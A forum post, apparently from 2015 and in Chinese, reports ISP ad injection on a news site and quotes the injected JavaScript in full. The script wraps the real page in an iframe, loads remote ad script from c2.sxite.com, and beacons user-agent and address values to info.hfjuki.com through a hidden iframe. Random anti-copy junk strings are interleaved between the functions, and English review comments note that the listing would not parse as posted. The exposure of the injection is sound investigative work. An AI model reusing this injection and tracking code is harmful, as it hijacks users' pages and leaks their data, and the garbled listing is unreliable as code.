|
本帖最后由 hudba 于 2015-2-3 00:56 编辑
上网易看新闻半天打不开,发现状态栏在显示访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现后面加了一段js,真正的新闻内容被放到iframe里了。
接下来就是去搜索这个域名,发现v2ex里面也有人遇到这个问题,原来是运营商搞的鬼。
https://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8
http://www.v2ex.com/t/142197
顺便查下ip138:

这是那段js里面的代码,好像是个半成品,还没写入广告数据:
/**
 * Returns the query-string part of the loader script's own URL.
 *
 * The script element is located with getMainJs(); the returned text starts
 * at the "?" that follows ".js" in its src (indexOf(".js?") + 3 points at
 * the "?"), so the result looks like "?name=value&...".
 *
 * @returns {string} The src of the loader script from the "?" onwards.
 */
function locationSearch() {
    var s = getMainJs();
    if (s == null) {
        // No matching <script> element was found: the page is reloaded.
        // Execution is not stopped here, so the s.src access below still
        // runs against null on this path.
        location.reload();
    }
    return s.src.substring(s.src.indexOf(".js?") + 3, s.src.length);
}
: S: ]' d. W3 w' E
/**
 * Extracts one parameter value from a "?a=1&b=2"-style string by manual
 * substring arithmetic.
 *
 * No decodeURIComponent (or any other decoding or validation) is applied,
 * so the value is returned exactly as it appears in the URL.
 *
 * @param {string} name - Parameter name to look up.
 * @param {string} paraStr - String containing "?" followed by the parameters.
 * @returns {string} The raw value, or the literal text "No such parameter"
 *     when "&name=" is not present.
 */
function getParameter(name, paraStr) {
    var result = "";
    // Only the text between the first and second "?" is searched; a leading
    // "&" is added so every parameter can be matched as "&name=".
    var str = "&" + paraStr.split("?")[1];
    var paraName = "&" + name + "=";
    if (str.indexOf(paraName) != -1) {
        // Is there another "&" after the first occurrence of the bare name?
        if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) {
            var TmpStr = str.substring(str.indexOf(paraName), str.length);
            // TmpStr starts with "&name=", so the search for the next "&"
            // is done on TmpStr without its first character.
            result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(
                    1, TmpStr.length).indexOf("&")
                    - TmpStr.indexOf(paraName) + 1);
        } else {
            result = str.substring(str.indexOf(paraName), str.length);
        }

        // Drop everything up to and including the first "=".
        result = result.substring(result.indexOf("=") + 1, result.length);
    } else {
        // A sentinel string, not null/undefined: callers in this listing
        // store it and later concatenate it into URLs unchanged.
        result = "No such parameter";
    }
    // String pattern: only the first "&" is removed.
    return (result.replace("&", ""));
}
- & z; z* u7 e* N( O; m3 c- w
/**
 * Finds the <script> element that loaded this code.
 *
 * The match is a plain substring test: the first script whose src contains
 * "t_c" is returned. For anyone inspecting an affected page, that substring
 * in a script URL is the marker this code itself relies on.
 *
 * @returns {?HTMLScriptElement} The first matching element, or null.
 */
function getMainJs() {
    var scripts = document.getElementsByTagName("script");
    var s = null;
    for (var i = 0; i < scripts.length; i++) {
        // NOTE(review): the first test compares an element with the string
        // "undefined", not with the undefined value - presumably a typeof
        // check was intended; as written it does not filter anything out.
        if (scripts[i] != "undefined" && scripts[i].src.indexOf("t_c") != -1) {
            s = scripts[i];
            break;
        }
    }
    return s;
}
/**
 * Appends a "name=value" fragment to a URL, using "&" when the URL already
 * contains a "?" after its first character and "?" otherwise.
 *
 * Nothing in the listing shown here calls this helper.
 *
 * @param {string} oStr - URL to extend.
 * @param {string} aStr - Fragment to append, added without any encoding.
 * @returns {string} The extended URL.
 */
function appendParam(oStr, aStr) {
    if (oStr.indexOf('?') > 0) {
        oStr = oStr + "&" + aStr;
    } else {
        oStr = oStr + "?" + aStr;
    }
    return oStr;
}
, z" O+ o u9 W: ^) A2 }1 Q - Y1 m9 j& Z5 Y- z& R9 {: M
// Replaces any existing page-wide error handler with an empty function, so
// whatever handler the page had installed no longer receives script errors.
window.onerror = function() {
};

// Counter incremented by setTcTitle() each time it reschedules itself.
var g_titleTime = 0;
/**
 * Copies the title of the document inside the iframe with id "cn" onto the
 * outer page, polling once per second until a title is available.
 *
 * Per the surrounding post, the iframe presumably holds the page the user
 * actually requested; copying its title makes the wrapper page carry the
 * same title as the framed page. Once a title has been copied,
 * setTcAdvVisible() is called.
 */
function setTcTitle() {
    if (undefined == document) {
        g_titleTime++;
        // String form of setTimeout: the text is evaluated as code.
        setTimeout("setTcTitle();", 1000);
        return;
    }

    var doc;
    try {
        // document.all / document.frames is the legacy Internet Explorer path.
        if (document.all) {
            doc = document.frames["cn"].document;
        } else {
            doc = document.getElementById("cn").contentDocument;
        }
    } catch (ex) {
        // Access failures (for example a cross-origin frame) are ignored;
        // doc stays undefined and the retry branch below handles it.
    }

    // Retry while no title can be read and g_titleTime is still below 5.
    if (g_titleTime < 5
            && (undefined == doc || undefined == doc.title || "" == doc.title)) {
        g_titleTime++;
        setTimeout("setTcTitle();", 1000);
        return;
    } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
        document.title = doc.title;
        setTcAdvVisible();
    }
}
- + W/ J0 \* ^/ L8 Y2 I+ ]
// First title poll, one second after this script runs (string form of
// setTimeout, evaluated as code).
setTimeout("setTcTitle();", 1000);

// Set to true by setTcAdvVisible() once the "addiv" element has been shown.
var g_isHaveVisible = false;
/**
 * Makes the element with id "addiv" visible, once.
 *
 * The element itself is not created anywhere in this listing; presumably it
 * is the injected ad container delivered by the same wrapper page - verify
 * against the captured HTML.
 */
function setTcAdvVisible() {
    if (undefined != document && undefined != document.getElementById("addiv")
            && !g_isHaveVisible) {
        document.getElementById("addiv").style.visibility = 'visible';
        document.getElementById("addiv").style.display = 'block';
        // Guard so later calls do nothing.
        g_isHaveVisible = true;
    }
}
7 F2 t) R+ |8 h8 @- u- _0 C; X8 c8 G
/**
 * Holder for the parameters read from the loader script's URL.
 *
 * Four fields start as empty strings here; initParameters() later fills
 * them and also adds address and usagent, which are not initialised in this
 * constructor.
 */
function UrlAnalyzer() {
    this.divda = "";
    this.tctype = "";
    this.radius = "";
    this.rlu = "";
}
+ ]. L$ b$ Q$ e2 n6 N% W
/**
 * Reads six parameters from the loader script's query string and stores
 * them on this object.
 *
 * The parameter names are those used in the URL; the values are whatever
 * getParameter() returns, including its "No such parameter" text when a
 * name is absent.
 */
UrlAnalyzer.prototype.initParameters = function() {
    var paraStr = locationSearch();
    this.rlu = getParameter("lruedct", paraStr);
    this.divda = getParameter("divda", paraStr);
    this.radius = getParameter("radius", paraStr);
    this.tctype = getParameter("tctype", paraStr);
    // address and usagent are later sent to the statistics URL built in
    // executeHtmlContext().
    this.address = getParameter("address", paraStr);
    this.usagent = getParameter("usagent", paraStr);
}
+ O7 Y9 s( L+ \6 y, c% n2 v2 m% \ - ) O- Y: f ?4 X# l9 l/ @2 l8 k
/**
 * Returns the document loaded inside the iframe with id "cn".
 *
 * @returns {Document|undefined} The framed document, or undefined when it
 *     cannot be reached (any exception during access is swallowed).
 */
UrlAnalyzer.prototype.getHtmlDoc = function() {
    var doc;
    try {
        // document.all / document.frames is the legacy Internet Explorer path.
        if (document.all) {
            doc = document.frames["cn"].document;
        } else {
            doc = document.getElementById("cn").contentDocument;
            // doc = document.getElementById("cn").contentWindow.document;
        }
    } catch (ex) {
        // Ignored on purpose: callers treat an undefined result as
        // "frame not readable yet".
    }
    return doc;
}
- " n* |' z5 b" I f+ ~" J
/**
 * Relaxes document.domain by one label and retries the title copy.
 *
 * Runs only while the outer page still has an empty title. Setting
 * document.domain to the parent domain (everything after the first ".")
 * is the legacy way to let frames on sibling subdomains script each other;
 * it also widens which other origins can reach this page, which is why a
 * third-party script doing this on a visited site is a finding in itself.
 */
UrlAnalyzer.prototype.setDomain = function() {
    if (undefined != document.title && "" == document.title)
    {
        var index = document.domain.indexOf(".");
        if (undefined != index && -1 != index) {
            // Drop the leftmost label of the host name.
            document.domain = document.domain.substring(index + 1,
                    document.domain.length);
        }

        var doc = this.getHtmlDoc();
        if (undefined != doc && undefined != doc.title && "" != doc.title) {
            document.title = doc.title;
            setTcAdvVisible();
        }
    }
}
- & X# ?) \; y d2 n% n |* Y0 l! n
/**
 * Load handler for the "cn" iframe.
 *
 * When the framed document's title can be read it is copied to the outer
 * page and setTcAdvVisible() is called. When it cannot be read, setDomain()
 * is scheduled one second later to relax document.domain and try again.
 */
UrlAnalyzer.prototype.iframeCallback = function() {
    var doc = this.getHtmlDoc();
    if (undefined == doc || undefined == doc.title || "" == doc.title) {
        if (undefined != document.domain) {

            var self = this;
            setTimeout(function(){self.setDomain.call(self, null)}, 1000);
            // The commented-out lines below are the same logic as
            // setDomain(), left behind from an earlier inline version.
            // var index = document.domain.indexOf(".");
            // if (undefined != index && -1 != index) {
            // document.domain = document.domain.substring(index + 1,
            // document.domain.length);
            // }
            //
            // var doc = this.getHtmlDoc();
            // if (undefined != doc && undefined != doc.title && "" !=
            // doc.title) {
            // document.title = doc.title;
            // setTcAdvVisible();
            // }
        }
    } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
        document.title = doc.title;
        setTcAdvVisible();
    }
}
; K2 B* m: X! ~: [" j" z- [) C - 8 C- _5 E4 Q. g* b! c# [3 p. Q1 w& {2 ~
/**
 * Writes the tracking iframe and the ad loader script into the page, then
 * hooks the load event of the "cn" iframe.
 *
 * Two hard-coded endpoints are contacted, both over plain HTTP on port 8060:
 * info.hfjuki.com (statistics) and c2.sxite.com (ad content). The values
 * placed in the URLs come straight from the loader script's query string
 * and are concatenated into markup without any encoding.
 *
 * NOTE(review): as posted, the double quotes inside the two HTML string
 * literals are not escaped, so this text would not parse as JavaScript;
 * presumably the forum dropped the backslashes of \" - confirm against a
 * raw capture before relying on this listing.
 */
UrlAnalyzer.prototype.executeHtmlContext = function() {
    // Statistics beacon. Note that the tctype parameter is filled from
    // this.divda, not this.tctype.
    var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda
            + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;

    // Hidden iframe that requests the statistics URL.
    var htmlStr = "<iframe src="" + staUrl
            + "" style="display:none"></iframe>";

    // Remote script include for the ad content, appended after the iframe.
    var advUrl = htmlStr
            + "<script src="http://c2.sxite.com:8060/center?advId="
            + this.divda + "&radius=" + this.radius + "&area=1" + ""><\/script>";
    document.write(advUrl);

    var self = this;
    var iframe = document.getElementById("cn");
    // attachEvent is the legacy Internet Explorer event API.
    if (iframe.attachEvent) {
        iframe.attachEvent("onload", function() {
            self.iframeCallback.call(self, null);
        });
    } else {
        iframe.onload = function() {
            self.iframeCallback.call(self, null);
        }
    }
}
% d% N/ T- N5 y - $ K" v2 [1 l, H# W1 e# O8 }9 z" R
/**
 * Entry point: re-navigates the "cn" iframe to its own src, reads the
 * parameters from the loader script URL, then writes the tracking and ad
 * markup via executeHtmlContext().
 */
UrlAnalyzer.prototype.executeMain = function() {
    var mainFrame = document.getElementById("cn");
    // Assigning the frame's src to its location forces the frame to load
    // that URL again.
    mainFrame.contentWindow.location.href = mainFrame.src;
    this.initParameters();
    this.executeHtmlContext();
}
- % y7 ^# U! ?4 }/ C' }
// Runs immediately when the injected script is evaluated; nothing waits for
// user interaction. Both endpoints contacted by executeMain()'s call chain
// are hard-coded http:// URLs on port 8060, which gives a network-level
// indicator to look for in proxy or DNS logs.
var g_analyzer = new UrlAnalyzer();
g_analyzer.executeMain();
|